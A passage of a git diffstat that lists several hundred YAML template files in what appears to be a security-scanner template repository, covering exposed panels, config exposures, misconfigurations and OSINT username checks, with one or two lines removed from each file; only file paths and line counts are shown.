http/exposed-panels/thinfinity-virtualui-panel.yaml | 2 -- http/exposed-panels/threatq-login.yaml | 2 -- http/exposed-panels/thruk-login.yaml | 2 -- http/exposed-panels/tikiwiki-cms.yaml | 2 -- http/exposed-panels/tiny-file-manager.yaml | 2 -- http/exposed-panels/tooljet-panel.yaml | 2 -- http/exposed-panels/total-web-solutions-panel.yaml | 2 -- http/exposed-panels/totemomail-panel.yaml | 2 -- http/exposed-panels/tracer-sc-login.yaml | 2 -- http/exposed-panels/traefik-dashboard.yaml | 2 -- http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml | 2 -- http/exposed-panels/tufin-securetrack-login.yaml | 2 -- http/exposed-panels/turnkey-openvpn.yaml | 2 -- http/exposed-panels/tuxedo-connected-controller.yaml | 2 -- http/exposed-panels/typo3-login.yaml | 2 -- http/exposed-panels/umbraco-login.yaml | 2 -- http/exposed-panels/unauth-xproxy-dashboard.yaml | 2 -- http/exposed-panels/unauthenticated-frp.yaml | 2 -- http/exposed-panels/unifi-panel.yaml | 2 -- http/exposed-panels/user-control-panel.yaml | 2 -- http/exposed-panels/v2924-admin-panel.yaml | 2 -- http/exposed-panels/vault-panel.yaml | 2 -- http/exposed-panels/veeam-backup-azure-panel.yaml | 2 -- http/exposed-panels/veeam-backup-gcp.yaml | 2 -- http/exposed-panels/veeam-panel.yaml | 2 -- http/exposed-panels/verizon-router-panel.yaml | 2 -- http/exposed-panels/versa/versa-director-login.yaml | 2 -- http/exposed-panels/versa/versa-flexvnf-panel.yaml | 2 -- http/exposed-panels/versa/versa-sdwan.yaml | 2 -- http/exposed-panels/vertex-tax-panel.yaml | 2 -- http/exposed-panels/vidyo-login.yaml | 2 -- http/exposed-panels/vigor-login.yaml | 2 -- http/exposed-panels/virtua-software-panel.yaml | 2 -- http/exposed-panels/virtual-ema-detect.yaml | 2 -- http/exposed-panels/vmware-carbon-black-edr.yaml | 2 -- http/exposed-panels/vmware-cloud-availability.yaml | 2 -- http/exposed-panels/vmware-cloud-director.yaml | 2 -- http/exposed-panels/vmware-ftp-server.yaml | 2 -- http/exposed-panels/vmware-hcx-login.yaml | 2 -- http/exposed-panels/vmware-horizon-panel.yaml | 2 -- http/exposed-panels/vmware-nsx-login.yaml | 2 -- http/exposed-panels/vmware-vcenter-converter-standalone.yaml | 2 -- http/exposed-panels/vmware-vcloud-director.yaml | 2 -- http/exposed-panels/vodafone-voxui-panel.yaml | 2 -- http/exposed-panels/voipmonitor-panel.yaml | 2 -- http/exposed-panels/vrealize-loginsight-panel.yaml | 2 -- http/exposed-panels/wago-plc-panel.yaml | 2 -- http/exposed-panels/wagtail-cms-detect.yaml | 2 -- http/exposed-panels/wallix-accessmanager-panel.yaml | 2 -- http/exposed-panels/wampserver-homepage.yaml | 2 -- http/exposed-panels/watchguard-panel.yaml | 2 -- http/exposed-panels/watershed-panel.yaml | 2 -- http/exposed-panels/weatherlink.yaml | 2 -- http/exposed-panels/weave-scope-dashboard.yaml | 2 -- http/exposed-panels/web-file-manager.yaml | 2 -- http/exposed-panels/web-local-craft.yaml | 2 -- http/exposed-panels/web-service-panel.yaml | 2 -- http/exposed-panels/webeditors-check-detect.yaml | 2 -- http/exposed-panels/weblogic-login.yaml | 2 -- http/exposed-panels/weblogic-uddiexplorer.yaml | 2 -- http/exposed-panels/webmin-panel.yaml | 2 -- http/exposed-panels/webmodule-ee-panel.yaml | 2 -- http/exposed-panels/webpagetest-panel.yaml | 2 -- http/exposed-panels/webroot-login.yaml | 2 -- http/exposed-panels/webshell4-login-panel.yaml | 2 -- http/exposed-panels/webuzo-admin-panel.yaml | 2 -- http/exposed-panels/weiphp-panel.yaml | 2 -- http/exposed-panels/whm-login-detect.yaml | 2 -- http/exposed-panels/wiren-board-webui.yaml | 2 -- http/exposed-panels/wmw-enterprise-panel.yaml | 2 -- http/exposed-panels/wordpress-login.yaml | 2 -- http/exposed-panels/workresources-rdp.yaml | 2 -- http/exposed-panels/workspace-one-uem.yaml | 2 -- http/exposed-panels/wowza-streaming-engine.yaml | 2 -- http/exposed-panels/wso2-management-console.yaml | 2 -- http/exposed-panels/xds-amr-status.yaml | 2 -- http/exposed-panels/xeams-admin-console.yaml | 2 -- http/exposed-panels/xenmobile-login.yaml | 2 -- http/exposed-panels/xfinity-panel.yaml | 2 -- http/exposed-panels/xiaomi-wireless-router-login.yaml | 2 -- http/exposed-panels/xibocms-login.yaml | 2 -- http/exposed-panels/xnat-login.yaml | 2 -- http/exposed-panels/xoops/xoops-installation-wizard.yaml | 2 -- http/exposed-panels/xvr-login.yaml | 2 -- http/exposed-panels/xweb500-panel.yaml | 2 -- http/exposed-panels/xxljob-panel.yaml | 2 -- http/exposed-panels/yarn-manager-exposure.yaml | 2 -- http/exposed-panels/yopass-panel.yaml | 2 -- http/exposed-panels/yzmcms-panel.yaml | 2 -- http/exposed-panels/zabbix-server-login.yaml | 2 -- http/exposed-panels/zblog-exposed-admin-panel.yaml | 2 -- http/exposed-panels/zblogphp-panel.yaml | 2 -- http/exposed-panels/zenario-login-panel.yaml | 2 -- http/exposed-panels/zentao-detect.yaml | 2 -- http/exposed-panels/zentral-panel.yaml | 2 -- http/exposed-panels/zeroshell-login.yaml | 2 -- http/exposed-panels/zimbra-web-client.yaml | 2 -- http/exposed-panels/zimbra-web-login.yaml | 2 -- http/exposed-panels/zipkin-exposure.yaml | 2 -- http/exposed-panels/zoho/manageengine-adaudit.yaml | 2 -- http/exposed-panels/zoho/manageengine-adselfservice.yaml | 2 -- http/exposed-panels/zoho/manageengine-analytics.yaml | 2 -- http/exposed-panels/zoho/manageengine-apex-helpdesk.yaml | 2 -- .../exposed-panels/zoho/manageengine-applications-manager.yaml | 2 -- http/exposed-panels/zoho/manageengine-assetexplorer.yaml | 2 -- http/exposed-panels/zoho/manageengine-desktop.yaml | 2 -- http/exposed-panels/zoho/manageengine-keymanagerplus.yaml | 2 -- http/exposed-panels/zoho/manageengine-network-config.yaml | 2 -- http/exposed-panels/zoho/manageengine-opmanager.yaml | 2 -- http/exposed-panels/zoho/manageengine-servicedesk.yaml | 2 -- http/exposed-panels/zoho/manageengine-supportcenter.yaml | 2 -- http/exposed-panels/zoneminder-login.yaml | 2 -- http/exposed-panels/zte-panel.yaml | 2 -- http/exposed-panels/zuul-panel.yaml | 2 -- http/exposed-panels/zyxel-router-panel.yaml | 2 -- http/exposed-panels/zyxel/zyxel-firewall-panel.yaml | 2 -- http/exposures/apis/couchbase-buckets-api.yaml | 2 -- http/exposures/apis/openapi.yaml | 2 -- http/exposures/apis/strapi-page.yaml | 2 -- http/exposures/apis/swagger-api.yaml | 2 -- http/exposures/apis/wadl-api.yaml | 2 -- http/exposures/apis/wsdl-api.yaml | 2 -- http/exposures/backups/exposed-mysql-initial.yaml | 2 -- http/exposures/backups/froxlor-database-backup.yaml | 2 -- http/exposures/backups/settings-php-files.yaml | 2 -- http/exposures/backups/sql-dump.yaml | 2 -- http/exposures/backups/zip-backup-files.yaml | 2 -- http/exposures/configs/accueil-wampserver.yaml | 2 -- http/exposures/configs/airflow-configuration-exposure.yaml | 2 -- http/exposures/configs/alibaba-canal-info-leak.yaml | 2 -- http/exposures/configs/amazon-docker-config.yaml | 2 -- http/exposures/configs/ansible-config-disclosure.yaml | 2 -- http/exposures/configs/apache-config.yaml | 2 -- http/exposures/configs/appspec-yml-disclosure.yaml | 2 -- http/exposures/configs/appveyor-configuration-file.yaml | 2 -- http/exposures/configs/awstats-config.yaml | 2 -- http/exposures/configs/awstats-script.yaml | 2 -- http/exposures/configs/azure-domain-tenant.yaml | 2 -- http/exposures/configs/babel-config-exposure.yaml | 2 -- http/exposures/configs/behat-config.yaml | 2 -- http/exposures/configs/cakephp-config.yaml | 2 -- http/exposures/configs/cgi-printenv.yaml | 2 -- http/exposures/configs/circleci-config.yaml | 2 -- http/exposures/configs/circleci-ssh-config.yaml | 2 -- http/exposures/configs/cisco-network-config.yaml | 2 -- http/exposures/configs/codeception-config.yaml | 2 -- http/exposures/configs/codeigniter-env.yaml | 2 -- http/exposures/configs/composer-config.yaml | 2 -- http/exposures/configs/config-json.yaml | 2 -- http/exposures/configs/config-rb.yaml | 2 -- http/exposures/configs/configuration-listing.yaml | 2 -- http/exposures/configs/coremail-config-disclosure.yaml | 2 -- http/exposures/configs/cypress-web-config.yaml | 2 -- http/exposures/configs/dbeaver-credentials.yaml | 2 -- http/exposures/configs/debug-vars.yaml | 2 -- http/exposures/configs/detect-drone-config.yaml | 2 -- http/exposures/configs/django-variables-exposed.yaml | 2 -- http/exposures/configs/docker-compose-config.yaml | 2 -- http/exposures/configs/dockerfile-hidden-disclosure.yaml | 2 -- http/exposures/configs/editor-exposure.yaml | 2 -- http/exposures/configs/esmtprc-config.yaml | 2 -- http/exposures/configs/exposed-authentication-asmx.yaml | 2 -- http/exposures/configs/exposed-bitkeeper.yaml | 2 -- http/exposures/configs/exposed-bzr.yaml | 2 -- http/exposures/configs/exposed-darcs.yaml | 2 -- http/exposures/configs/exposed-gitignore.yaml | 2 -- http/exposures/configs/exposed-hg.yaml | 2 -- http/exposures/configs/exposed-sharepoint-list.yaml | 2 -- http/exposures/configs/exposed-svn.yaml | 2 -- http/exposures/configs/exposed-vscode.yaml | 2 -- http/exposures/configs/firebase-config-exposure.yaml | 2 -- http/exposures/configs/ftp-credentials-exposure.yaml | 2 -- http/exposures/configs/gcloud-config-default.yaml | 2 -- http/exposures/configs/git-config-nginxoffbyslash.yaml | 2 -- http/exposures/configs/git-config.yaml | 2 -- http/exposures/configs/git-credentials-disclosure.yaml | 2 -- http/exposures/configs/gmail-api-client-secrets.yaml | 2 -- http/exposures/configs/golangci-config.yaml | 2 -- http/exposures/configs/gruntfile-exposure.yaml | 2 -- http/exposures/configs/guard-config.yaml | 2 -- http/exposures/configs/hikvision-info-leak.yaml | 2 -- http/exposures/configs/honeywell-scada-config.yaml | 2 -- http/exposures/configs/hp-ilo-serial-key-disclosure.yaml | 2 -- http/exposures/configs/htpasswd-detection.yaml | 2 -- http/exposures/configs/httpd-config.yaml | 2 -- http/exposures/configs/javascript-env.yaml | 2 -- http/exposures/configs/jetbrains-datasources.yaml | 2 -- http/exposures/configs/joomla-config-file.yaml | 2 -- http/exposures/configs/karma-config-js.yaml | 2 -- http/exposures/configs/keycloak-openid-config.yaml | 2 -- .../exposures/configs/kubernetes-kustomization-disclosure.yaml | 2 -- http/exposures/configs/laravel-env.yaml | 2 -- http/exposures/configs/lvmeng-uts-disclosure.yaml | 2 -- http/exposures/configs/magento-config-disclosure.yaml | 2 -- http/exposures/configs/msmtp-config.yaml | 2 -- http/exposures/configs/nagios-status-page.yaml | 2 -- http/exposures/configs/netbeans-config.yaml | 2 -- http/exposures/configs/netrc.yaml | 2 -- http/exposures/configs/nginx-config.yaml | 2 -- http/exposures/configs/opcache-status-exposure.yaml | 2 -- http/exposures/configs/oracle-cgi-printenv.yaml | 2 -- http/exposures/configs/oracle-ebs-credentials.yaml | 2 -- http/exposures/configs/ovpn-config-exposed.yaml | 2 -- http/exposures/configs/owncloud-config.yaml | 2 -- http/exposures/configs/package-json.yaml | 2 -- http/exposures/configs/parameters-config.yaml | 2 -- http/exposures/configs/perl-status.yaml | 2 -- http/exposures/configs/phalcon-framework-source.yaml | 2 -- http/exposures/configs/php-fpm-config.yaml | 2 -- http/exposures/configs/phpinfo-files.yaml | 2 -- http/exposures/configs/phpsec-config.yaml | 2 -- http/exposures/configs/phpstan-config.yaml | 2 -- http/exposures/configs/pipfile-config.yaml | 2 -- http/exposures/configs/plesk-stat.yaml | 2 -- http/exposures/configs/pre-commit-config.yaml | 2 -- http/exposures/configs/procfile-config.yaml | 2 -- http/exposures/configs/proftpd-config.yaml | 2 -- http/exposures/configs/prometheus-metrics.yaml | 2 -- http/exposures/configs/proxy-wpad-exposure.yaml | 2 -- http/exposures/configs/pubspec-config.yaml | 2 -- http/exposures/configs/pyproject-toml.yaml | 2 -- http/exposures/configs/qdpm-info-leak.yaml | 2 -- http/exposures/configs/rackup-config-ru.yaml | 2 -- http/exposures/configs/rails-database-config.yaml | 2 -- http/exposures/configs/redis-config.yaml | 2 -- http/exposures/configs/robomongo-credential.yaml | 2 -- http/exposures/configs/rollup-js-config.yaml | 2 -- http/exposures/configs/rubocop-config.yaml | 2 -- http/exposures/configs/ruijie-information-disclosure.yaml | 2 -- http/exposures/configs/ruijie-nbr1300g-exposure.yaml | 2 -- http/exposures/configs/ruijie-phpinfo.yaml | 2 -- http/exposures/configs/s3cfg-config.yaml | 2 -- http/exposures/configs/s3cmd-config.yaml | 2 -- http/exposures/configs/saia-web-server-info.yaml | 2 -- http/exposures/configs/samba-config.yaml | 2 -- http/exposures/configs/scrutinizer-config.yaml | 2 -- http/exposures/configs/server-private-keys.yaml | 2 -- http/exposures/configs/sftp-config-exposure.yaml | 2 -- http/exposures/configs/sftp-credentials-exposure.yaml | 2 -- http/exposures/configs/sftp-deployment-config.yaml | 2 -- http/exposures/configs/ssh-authorized-keys.yaml | 2 -- http/exposures/configs/ssh-known-hosts.yaml | 2 -- http/exposures/configs/stestr-config.yaml | 2 -- http/exposures/configs/svnserve-config.yaml | 2 -- http/exposures/configs/symfony-database-config.yaml | 2 -- http/exposures/configs/symfony-profiler.yaml | 2 -- http/exposures/configs/symfony-security-config.yaml | 2 -- http/exposures/configs/tox-ini.yaml | 2 -- http/exposures/configs/ventrilo-config.yaml | 2 -- http/exposures/configs/web-config.yaml | 2 -- http/exposures/configs/webpack-config.yaml | 2 -- http/exposures/configs/websheets-config.yaml | 2 -- http/exposures/configs/wgetrc-config.yaml | 2 -- http/exposures/configs/xprober-service.yaml | 2 -- http/exposures/files/db-xml-file.yaml | 2 -- http/exposures/files/dbeaver-database-connections.yaml | 2 -- http/exposures/files/dwsync-exposure.yaml | 2 -- http/exposures/files/ioncube-loader-wizard.yaml | 2 -- http/exposures/files/jetbrains-webservers.yaml | 2 -- http/exposures/files/joomla-file-listing.yaml | 2 -- http/exposures/files/phpunit.yaml | 2 -- http/exposures/files/redmine-config.yaml | 2 -- http/exposures/files/salesforce-credentials.yaml | 2 -- http/exposures/files/sensitive-storage-exposure.yaml | 2 -- http/exposures/logs/fastcgi-echo.yaml | 2 -- http/exposures/logs/oracle-ebs-sqllog-disclosure.yaml | 2 -- http/exposures/logs/struts-problem-report.yaml | 2 -- .../tokens/digitalocean/axiom-digitalocean-key-exposure.yaml | 2 -- .../exposures/tokens/digitalocean/tugboat-config-exposure.yaml | 2 -- http/fuzzing/header-command-injection.yaml | 2 -- http/fuzzing/iis-shortname.yaml | 2 -- http/fuzzing/linux-lfi-fuzzing.yaml | 2 -- http/fuzzing/mdb-database-file.yaml | 2 -- http/fuzzing/waf-fuzz.yaml | 2 -- http/fuzzing/wordpress-weak-credentials.yaml | 2 -- http/iot/automation-direct.yaml | 2 -- http/iot/codian-mcu-login.yaml | 2 -- http/iot/panasonic-network-management.yaml | 2 -- http/iot/qvisdvr-deserialization-rce.yaml | 2 -- http/miscellaneous/joomla-manifest-file.yaml | 2 -- http/misconfiguration/ace-admin-dashboard.yaml | 2 -- http/misconfiguration/aem/aem-childrenlist-xss.yaml | 2 -- http/misconfiguration/aem/aem-crx-bypass.yaml | 2 -- http/misconfiguration/aem/aem-groovyconsole.yaml | 2 -- http/misconfiguration/aem/aem-setpreferences-xss.yaml | 2 -- http/misconfiguration/aem/aem-userinfo-servlet.yaml | 2 -- http/misconfiguration/aem/aem-xss-childlist-selector.yaml | 2 -- http/misconfiguration/akamai/akamai-arl-xss.yaml | 2 -- http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml | 2 -- http/misconfiguration/ampps-dirlisting.yaml | 2 -- http/misconfiguration/apache/tomcat-pathnormalization.yaml | 2 -- http/misconfiguration/aws-s3-explorer.yaml | 2 -- http/misconfiguration/bootstrap-admin-panel-template.yaml | 2 -- http/misconfiguration/cadvisor-exposure.yaml | 2 -- http/misconfiguration/command-api-explorer.yaml | 2 -- http/misconfiguration/cx-cloud-upload-detect.yaml | 2 -- http/misconfiguration/d-link-arbitary-fileread.yaml | 2 -- http/misconfiguration/deos-openview-admin.yaml | 2 -- http/misconfiguration/dgraph-dashboard-exposure.yaml | 2 -- http/misconfiguration/encompass-cm1-homepage.yaml | 2 -- http/misconfiguration/exposed-jquery-file-upload.yaml | 2 -- http/misconfiguration/exposed-sqlite-manager.yaml | 2 -- http/misconfiguration/ganglia-cluster-dashboard.yaml | 2 -- http/misconfiguration/hadoop-unauth-rce.yaml | 2 -- http/misconfiguration/haproxy-status.yaml | 2 -- http/misconfiguration/installer/avideo-install.yaml | 2 -- http/misconfiguration/installer/circarlife-setup.yaml | 2 -- http/misconfiguration/installer/getsimple-installation.yaml | 2 -- http/misconfiguration/installer/mcloud-installer.yaml | 2 -- http/misconfiguration/installer/nopcommerce-installer.yaml | 2 -- http/misconfiguration/installer/openshift-installer-panel.yaml | 2 -- http/misconfiguration/installer/wp-install.yaml | 2 -- http/misconfiguration/installer/zenphoto-setup.yaml | 2 -- http/misconfiguration/iot-vdme-simulator.yaml | 2 -- http/misconfiguration/jboss-status.yaml | 2 -- http/misconfiguration/jolokia/jolokia-unauthenticated-lfi.yaml | 2 -- http/misconfiguration/jupyter-ipython-unauth.yaml | 2 -- http/misconfiguration/kubernetes/kubernetes-pods.yaml | 2 -- http/misconfiguration/misconfigured-docker.yaml | 2 -- http/misconfiguration/mobiproxy-dashboard.yaml | 2 -- http/misconfiguration/mongodb-exporter-metrics.yaml | 2 -- http/misconfiguration/mysqld-exporter-metrics.yaml | 2 -- http/misconfiguration/nomad-jobs.yaml | 2 -- http/misconfiguration/ntopng-traffic-dashboard.yaml | 2 -- http/misconfiguration/office365-open-redirect.yaml | 2 -- http/misconfiguration/oneinstack-control-center.yaml | 2 -- http/misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml | 2 -- http/misconfiguration/openbmcs/openbmcs-ssrf.yaml | 2 -- http/misconfiguration/pghero-dashboard-exposure.yaml | 2 -- .../phpmyadmin/phpmyadmin-misconfiguration.yaml | 2 -- http/misconfiguration/phpmyadmin/phpmyadmin-server-import.yaml | 2 -- http/misconfiguration/prometheus/prometheus-config.yaml | 2 -- http/misconfiguration/proxy/metadata-alibaba.yaml | 2 -- http/misconfiguration/proxy/metadata-aws.yaml | 1 - http/misconfiguration/proxy/metadata-azure.yaml | 1 - http/misconfiguration/proxy/metadata-digitalocean.yaml | 1 - http/misconfiguration/proxy/metadata-google.yaml | 1 - http/misconfiguration/proxy/metadata-hetzner.yaml | 1 - http/misconfiguration/proxy/metadata-openstack.yaml | 2 -- http/misconfiguration/proxy/metadata-oracle.yaml | 1 - http/misconfiguration/proxy/open-proxy-internal.yaml | 2 -- http/misconfiguration/proxy/open-proxy-localhost.yaml | 2 -- http/misconfiguration/proxy/open-proxy-portscan.yaml | 2 -- http/misconfiguration/puppetdb-dashboard.yaml | 2 -- http/misconfiguration/put-method-enabled.yaml | 2 -- http/misconfiguration/questdb-console.yaml | 2 -- http/misconfiguration/rack-mini-profiler.yaml | 2 -- http/misconfiguration/rekognition-image-validation.yaml | 2 -- http/misconfiguration/rethinkdb-admin-console.yaml | 2 -- http/misconfiguration/s3-torrent.yaml | 2 -- http/misconfiguration/salesforce-aura.yaml | 2 -- http/misconfiguration/selenium-exposure.yaml | 2 -- http/misconfiguration/server-status.yaml | 2 -- http/misconfiguration/service-pwd.yaml | 2 -- http/misconfiguration/skycaiji-install.yaml | 2 -- http/misconfiguration/slurm-hpc-dashboard.yaml | 2 -- http/misconfiguration/solr-query-dashboard.yaml | 2 -- http/misconfiguration/spidercontrol-scada-server-info.yaml | 2 -- http/misconfiguration/springboot/springboot-auditevents.yaml | 2 -- http/misconfiguration/springboot/springboot-health.yaml | 2 -- http/misconfiguration/springboot/springboot-info.yaml | 2 -- http/misconfiguration/springboot/springboot-loggerconfig.yaml | 2 -- .../misconfiguration/springboot/springboot-scheduledtasks.yaml | 2 -- http/misconfiguration/springboot/springboot-status.yaml | 2 -- http/misconfiguration/symfony-debug.yaml | 2 -- http/misconfiguration/tcpconfig.yaml | 2 -- .../teamcity/teamcity-registration-enabled.yaml | 2 -- http/misconfiguration/transmission-dashboard.yaml | 2 -- http/misconfiguration/unauth-fastvue-dashboard.yaml | 2 -- http/misconfiguration/unauth-selenium-grid-console.yaml | 2 -- http/misconfiguration/unauth-wavink-panel.yaml | 2 -- http/misconfiguration/unauthenticated-alert-manager.yaml | 2 -- http/misconfiguration/unauthenticated-mongo-express.yaml | 2 -- http/misconfiguration/unauthenticated-nacos-access.yaml | 2 -- http/misconfiguration/unauthenticated-popup-upload.yaml | 2 -- http/misconfiguration/unauthenticated-prtg.yaml | 2 -- http/misconfiguration/unauthenticated-tensorboard.yaml | 2 -- http/misconfiguration/unauthenticated-zipkin.yaml | 2 -- http/misconfiguration/unauthorized-h3csecparh-login.yaml | 2 -- http/misconfiguration/unauthorized-plastic-scm.yaml | 2 -- http/misconfiguration/ups-status.yaml | 2 -- http/misconfiguration/wamp-xdebug-detect.yaml | 2 -- http/misconfiguration/webdav-enabled.yaml | 2 -- http/misconfiguration/wildcard-postmessage.yaml | 2 -- http/misconfiguration/wp-registration-enabled.yaml | 2 -- http/misconfiguration/xss-deprecated-header.yaml | 2 -- http/misconfiguration/zabbix-dashboards-access.yaml | 2 -- http/misconfiguration/zabbix-error.yaml | 2 -- http/osint/1001mem.yaml | 2 -- http/osint/21buttons.yaml | 2 -- http/osint/247sports.yaml | 2 -- http/osint/3dnews.yaml | 2 -- http/osint/3dtoday.yaml | 2 -- http/osint/7cup.yaml | 2 -- http/osint/7dach.yaml | 2 -- http/osint/aaha-chat.yaml | 2 -- http/osint/aboutme.yaml | 2 -- http/osint/acf.yaml | 2 -- http/osint/admire-me.yaml | 2 -- http/osint/adult-forum.yaml | 2 -- http/osint/adultism.yaml | 2 -- http/osint/advfn.yaml | 2 -- http/osint/aflam.yaml | 2 -- http/osint/airline-pilot-life.yaml | 2 -- http/osint/airliners.yaml | 2 -- http/osint/akniga.yaml | 2 -- http/osint/albicla.yaml | 2 -- http/osint/alik.yaml | 2 -- http/osint/allesovercrypto.yaml | 2 -- http/osint/allmylinks.yaml | 2 -- http/osint/alloannonces.yaml | 2 -- http/osint/alltrails.yaml | 2 -- http/osint/ameblo.yaml | 2 -- http/osint/americanthinker.yaml | 2 -- http/osint/animeplanet.yaml | 2 -- http/osint/anobii.yaml | 2 -- http/osint/anonup.yaml | 2 -- http/osint/apex-legends.yaml | 2 -- http/osint/appian.yaml | 2 -- http/osint/apteka.yaml | 2 -- http/osint/archive-of-our-own-account.yaml | 2 -- http/osint/arduino.yaml | 2 -- http/osint/armorgames.yaml | 2 -- http/osint/artbreeder.yaml | 2 -- http/osint/artists-clients.yaml | 2 -- http/osint/artstation.yaml | 2 -- http/osint/asciinema.yaml | 2 -- http/osint/askfm.yaml | 2 -- http/osint/audiojungle.yaml | 2 -- http/osint/auru.yaml | 2 -- http/osint/authorstream.yaml | 2 -- http/osint/avid-community.yaml | 2 -- http/osint/babepedia.yaml | 2 -- http/osint/babypips.yaml | 2 -- http/osint/bandcamp.yaml | 2 -- http/osint/bandlab.yaml | 2 -- http/osint/bblog-ru.yaml | 2 -- http/osint/bdsmlr.yaml | 2 -- http/osint/bdsmsingles.yaml | 2 -- http/osint/behance.yaml | 2 -- http/osint/bentbox.yaml | 2 -- http/osint/biggerpockets.yaml | 2 -- http/osint/bigo-live.yaml | 2 -- http/osint/bikemap.yaml | 2 -- http/osint/bimpos.yaml | 2 -- http/osint/biolink.yaml | 2 -- http/osint/bitbucket.yaml | 2 -- http/osint/bitchute.yaml | 2 -- http/osint/bitcoin-forum.yaml | 2 -- http/osint/bittube.yaml | 2 -- http/osint/blipfm.yaml | 2 -- http/osint/blogger.yaml | 2 -- http/osint/blogipl.yaml | 2 -- http/osint/blogmarks.yaml | 2 -- http/osint/blogspot.yaml | 2 -- http/osint/bodybuildingcom.yaml | 2 -- http/osint/bonga-cams.yaml | 2 -- http/osint/bookcrossing.yaml | 2 -- http/osint/boosty.yaml | 2 -- http/osint/booth.yaml | 2 -- http/osint/breach-forums.yaml | 2 -- http/osint/brickset.yaml | 2 -- http/osint/bugcrowd.yaml | 2 -- http/osint/bunpro.yaml | 2 -- http/osint/buymeacoffee.yaml | 2 -- http/osint/buzzfeed.yaml | 2 -- http/osint/buzznet.yaml | 2 -- http/osint/cafecito.yaml | 2 -- http/osint/cal.yaml | 2 -- http/osint/calendy.yaml | 2 -- http/osint/cameo.yaml | 2 -- http/osint/carbonmade.yaml | 2 -- http/osint/careerhabr.yaml | 2 -- http/osint/caringbridge.yaml | 2 -- http/osint/carrdco.yaml | 2 -- http/osint/cashapp.yaml | 2 -- http/osint/castingcallclub.yaml | 2 -- http/osint/cd-action.yaml | 2 -- http/osint/cdapl.yaml | 2 -- http/osint/championat.yaml | 2 -- http/osint/chamsko.yaml | 2 -- http/osint/chaturbate.yaml | 2 -- http/osint/cheezburger.yaml | 2 -- http/osint/chesscom.yaml | 2 -- http/osint/chomikujpl.yaml | 2 -- http/osint/chyoa.yaml | 2 -- http/osint/climatejusticerocks-mastodon-instance.yaml | 2 -- http/osint/cloudflare.yaml | 2 -- http/osint/clubhouse.yaml | 2 -- http/osint/clusterdafrica.yaml | 2 -- http/osint/cnet.yaml | 2 -- http/osint/codeberg.yaml | 2 -- http/osint/codecademy.yaml | 2 -- http/osint/codeforces.yaml | 2 -- http/osint/codementor.yaml | 2 -- http/osint/coderwall.yaml | 2 -- http/osint/codewars.yaml | 2 -- http/osint/cohost.yaml | 2 -- http/osint/colourlovers.yaml | 2 -- http/osint/contactossex.yaml | 2 -- http/osint/coroflot.yaml | 2 -- http/osint/couchsurfing.yaml | 2 -- http/osint/cowboys4angels.yaml | 2 -- http/osint/cracked-io.yaml | 2 -- http/osint/cracked.yaml | 2 -- http/osint/crevado.yaml | 2 -- http/osint/crowdin.yaml | 2 -- http/osint/ctflearn.yaml | 2 -- http/osint/cults3d.yaml | 2 -- http/osint/curiouscat.yaml | 2 -- http/osint/cytoid.yaml | 2 -- http/osint/dailymotion.yaml | 2 -- http/osint/darudar.yaml | 2 -- http/osint/dateinasia.yaml | 2 -- http/osint/datezone.yaml | 2 -- http/osint/datingru.yaml | 2 -- http/osint/demotywatory.yaml | 2 -- http/osint/depop.yaml | 2 -- http/osint/designspriation.yaml | 2 -- http/osint/destructoid.yaml | 2 -- http/osint/deviantart.yaml | 2 -- http/osint/devrant.yaml | 2 -- http/osint/devto.yaml | 2 -- http/osint/dfgames.yaml | 2 -- http/osint/diablo.yaml | 2 -- http/osint/dibiz.yaml | 2 -- http/osint/digitalspy.yaml | 2 -- http/osint/diigo.yaml | 2 -- http/osint/disabledrocks-mastodon-instance.yaml | 2 -- http/osint/discogs.yaml | 2 -- http/osint/discourse.yaml | 2 -- http/osint/discusselasticco.yaml | 2 -- http/osint/discusssocial-mastodon-instance.yaml | 2 -- http/osint/disqus.yaml | 2 -- http/osint/dissenter.yaml | 2 -- http/osint/dockerhub.yaml | 2 -- http/osint/dojoverse.yaml | 2 -- http/osint/donation-alerts.yaml | 2 -- http/osint/dotcards.yaml | 2 -- http/osint/dribbble.yaml | 2 -- http/osint/droners.yaml | 2 -- http/osint/drum.yaml | 2 -- http/osint/duolingo.yaml | 2 -- http/osint/easyen.yaml | 2 -- http/osint/ebay-stores.yaml | 2 -- http/osint/ebay.yaml | 2 -- http/osint/elloco.yaml | 2 -- http/osint/engadget.yaml | 2 -- http/osint/eporner.yaml | 2 -- http/osint/etoro.yaml | 2 -- http/osint/etsy.yaml | 2 -- http/osint/expressionalsocial-mastodon-instance.yaml | 2 -- http/osint/extralunchmoney.yaml | 2 -- http/osint/eyeem.yaml | 2 -- http/osint/f3.yaml | 2 -- http/osint/fabswingers.yaml | 2 -- http/osint/faktopedia.yaml | 2 -- http/osint/fancentro.yaml | 2 -- http/osint/fandalism.yaml | 2 -- http/osint/fandom.yaml | 2 -- http/osint/fanpop.yaml | 2 -- http/osint/fansly.yaml | 2 -- http/osint/fark.yaml | 2 -- http/osint/farkascity.yaml | 2 -- http/osint/fatsecret.yaml | 2 -- http/osint/fcv.yaml | 2 -- http/osint/federatedpress-mastodon-instance.yaml | 2 -- http/osint/figma.yaml | 2 -- http/osint/filmweb.yaml | 2 -- http/osint/fine-art-america.yaml | 2 -- http/osint/fiverr.yaml | 2 -- http/osint/flickr.yaml | 2 -- http/osint/flipboard.yaml | 2 -- http/osint/flowcode.yaml | 2 -- http/osint/fodors-forum.yaml | 2 -- http/osint/fortnite-tracker.yaml | 2 -- http/osint/forumprawneorg.yaml | 2 -- http/osint/fosstodonorg-mastodon-instance.yaml | 2 -- http/osint/fotka.yaml | 2 -- http/osint/foursquare.yaml | 2 -- http/osint/freelancer.yaml | 2 -- http/osint/freesound.yaml | 2 -- http/osint/friendfinder-x.yaml | 2 -- http/osint/friendfinder.yaml | 2 -- http/osint/friendweb.yaml | 2 -- http/osint/furaffinity.yaml | 2 -- http/osint/furiffic.yaml | 2 -- http/osint/gab.yaml | 2 -- http/osint/game-debate.yaml | 2 -- http/osint/gamespot.yaml | 2 -- http/osint/garmin-connect.yaml | 2 -- http/osint/geocaching.yaml | 2 -- http/osint/getmonero.yaml | 2 -- http/osint/gettr.yaml | 2 -- http/osint/gfycat.yaml | 2 -- http/osint/gigapan.yaml | 2 -- http/osint/giphy.yaml | 2 -- http/osint/girlfriendsmeet.yaml | 2 -- http/osint/gitea.yaml | 2 -- http/osint/gitee.yaml | 2 -- http/osint/giters.yaml | 2 -- http/osint/github.yaml | 2 -- http/osint/gitlab.yaml | 2 -- http/osint/gloriatv.yaml | 2 -- 